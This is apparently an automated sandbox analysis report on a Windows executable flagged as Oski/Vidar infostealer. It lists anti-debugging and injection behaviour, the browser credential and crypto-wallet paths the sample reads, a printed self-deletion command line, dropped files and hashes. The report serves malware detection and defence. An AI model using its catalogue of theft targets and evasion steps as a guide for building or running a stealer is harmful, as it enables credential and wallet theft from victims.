Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Is looking for software installed on the system

Source: C:\Users\user\Desktop\gunzipped.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 1_2_007CB4E0 GetSystemInfo,

1_2_007CB4E0

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_00405C06 FindFirstFileA,FindClose,	0_2_00405C06
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_00405234 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405234
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_00402630 FindFirstFileA,	0_2_00402630
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_00405C06 FindFirstFileA,FindClose,	1_2_00405C06
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_00402630 FindFirstFileA,	1_2_00402630
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_00405234 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_00405234
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B43DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,	1_2_007B43DF
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007D0540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,	1_2_007D0540
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CE640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	1_2_007CE640
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CD360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	1_2_007CD360
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CF6B0 FindFirstFileExW,	1_2_007CF6B0

Source: C:\Users\user\Desktop\gunzipped.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior

Source: gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33B734 IsDebuggerPresent,

0_2_6F33B734

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\gunzipped.exe

0_2_6F33A967

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00405C2D GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405C2D

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33744F GetProcessHeap,

0_2_6F33744F

Enables debug privileges

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019EA30 mov eax, dword ptr fs:[00000030h]	0_2_0019EA30
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019E6EE mov eax, dword ptr fs:[00000030h]	0_2_0019E6EE
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019E902 mov eax, dword ptr fs:[00000030h]	0_2_0019E902
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019E9B3 mov eax, dword ptr fs:[00000030h]	0_2_0019E9B3
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019E9F2 mov eax, dword ptr fs:[00000030h]	0_2_0019E9F2
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C96D0 mov eax, dword ptr fs:[00000030h]	1_2_007C96D0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CB750 mov eax, dword ptr fs:[00000030h]	1_2_007CB750

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F337F7D SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6F337F7D
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B72E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_007B72E6
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B4354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_007B4354
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007BE5C7 SetUnhandledExceptionFilter,	1_2_007BE5C7

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\gunzipped.exe

Memory written: C:\Users\user\Desktop\gunzipped.exe base: 7B0000 value starts with: 4D5A

Jump to behavior

Uses taskkill to terminate processes

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 1068 & erase C:\Users\user\Desktop\gunzipped.exe & RD /S /Q C:\\ProgramData\\834793065949733\\* & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\autofill\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\cc\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\cookies\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\outlook.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\passwords.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\screenshot.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\system.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,

1_2_007CAA60

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33B9B4 cpuid

0_2_6F33B9B4

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\gunzipped.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F337ABA GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6F337ABA

Source: C:\Users\user\Desktop\gunzipped.exe

1_2_007BD6E2

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00405931 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405931

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 1_2_007CB1E0 GetUserNameA,

1_2_007CB1E0

Stealing of Sensitive Information:

Yara detected Oski Stealer

Source: Yara match	File source: 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR
Source: Yara match	File source: 0.2.gunzipped.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.gunzipped.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.313926624.0000000002CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.311405289.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.311858947.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.310462508.00000000007B0000.00000040.00000001.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: gunzipped.exe, 00000001.00000003.328713663.0000000000CA5000.00000004.00000001.sdmp	String found in binary or memory: Electrum-LTC
Source: gunzipped.exe, 00000001.00000003.328391713.0000000000CAA000.00000004.00000001.sdmp	String found in binary or memory: ElectronCashxg
Source: gunzipped.exe, 00000001.00000003.328391713.0000000000CAA000.00000004.00000001.sdmp	String found in binary or memory: jaxxxE[
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: window-state.json
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: exodus.conf.json
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: \\Exodus\\exodus.wallet\\
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: info.seco
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: passphrase.json
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: \\Ethereum\\
Source: gunzipped.exe, 00000001.00000003.328713663.0000000000CA5000.00000004.00000001.sdmp	String found in binary or memory: Exodus
Source: gunzipped.exe, 00000001.00000002.332519654.0000000000C8E000.00000004.00000020.sdmp	String found in binary or memory: Ethereum
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: default_wallet
Source: gunzipped.exe, 00000001.00000002.332519654.0000000000C8E000.00000004.00000020.sdmp	String found in binary or memory: MultiDoge
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: seed.seco
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR

Remote Access Functionality:

Yara detected Oski Stealer

Source: Yara match	File source: 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR
Source: Yara match	File source: 0.2.gunzipped.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.gunzipped.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.313926624.0000000002CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.311405289.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.311858947.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.310462508.00000000007B0000.00000040.00000001.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR

ID:	548641
Product:	CloudBasic
Start time:	07:56:19
Start date:	06.01.2022
Sample:	gunzipped.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	c2301b62539adcba29dcf6a3200bd017
SHA1:	fd80f7e8e32661d5ec12e7a901f22a9ed82e17a7
SHA256:	c30ce79d7b5b0708dc03f1532fa89afd4efd732531cb557dc31fe63acd5bc1ce
Filetype:	Win32 Executable (generic) a (10002005/4) 92.16%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\834793065949733\_8347930659.zip	Zip archive data, at least v2.0 to extract	20E941DA619EC55FB66739FDBB3AE60A	3B753E336E1FC00DED7B5A00F814A7CC4A00C371	2D03A2D1771B18DC04FB65ABE96BA5CAED60C75107642FD85175CDE7D693B24A
C:\ProgramData\834793065949733\cookies\Google Chrome_Default.txt	ASCII text, with CRLF line terminators	550A7FD2AB480B2F537E0CB278AB1906	3B890274F3CFC06C13E6CB6B048FFB6D5E80BB34	461A1E12872241809075955E29ED062E3283BF5BDA7B04DD59D35525D01076FA
C:\ProgramData\834793065949733\screenshot.jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3	7F5FC67C3596CACA2555486AD1BD7E93	F12A8FE3FDF6ECA7155D126E0DB43C5B3467CC05	F19517B03A8B3F840567EB32AC900A69632130709404485324D61C05A2542C1B
C:\ProgramData\834793065949733\system.txt	ISO-8859 text, with CRLF line terminators	ED8730C613A0A5DC9E9E9CE1F24E27ED	B2009BBB38C03BD645544F4C17B9278F977E011D	7CF0919C9D331047CAE91B4A2B3795E321C39E86EC864724BE1D9678FC7C81E2
C:\ProgramData\834793065949733\temp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	EF2834AC4EE7D6724F255BEAF527E635	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	8F73C08A9660691143661BF7332C3C27	37FA65DD737C50FDA710FDBDE89E51374D0C204A	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	109F0F02FD37C84BFC7508D4227D7ED5	EF7420141BB15AC334D3964082361A460BFDB975	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	BFAC4E3C5908856BA17D41EDCD455A51	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	A2EE53DE9167BF0D6C019303B7CA84E5	2A3C737FA1157E8483815E98B666408A18C0DB42	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
C:\ProgramData\sqlite3.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	E477A96C8F2B18D6B5C27BDE49C990BF	E980C9BF41330D1E5BD04556DB4646A0210F7409	16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	7587BF9CB4147022CD5681B015183046	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
C:\Users\user\AppData\Local\Temp\3lzr9t8b2fewpx2	data	67C52576EB74D18C73D0BE686FE1BF42	57151D72EED1183BC2C30B2D01AF07A33BE98D0E	9F9DB61E4AB13EA92FDBC6F2D8DEE31856A1D73C21707F124C877EF11064BC88
C:\Users\user\AppData\Local\Temp\dxaqqkiiu	data	8353B19099AFDFB112BB96A1C747E5D0	101FA6D10ECABCE84D5B78CDF0C722F276E5EEB7	4CD618A1C5962A8FA87614B875CA3B3F863FB0EC5CF380056E146767C458A2FE
C:\Users\user\AppData\Local\Temp\nsy255F.tmp\qhvek.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	E1821B88AE16DB674B9A0D7E3C1EABEB	966B2FD636A330B3812C8AAE9CE7A12D98E105B7	B570A242266192CDB433F2AF8E5FC2B54368DCF6F2F385DFD836032403EF4520

Windows Analysis Report gunzipped.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs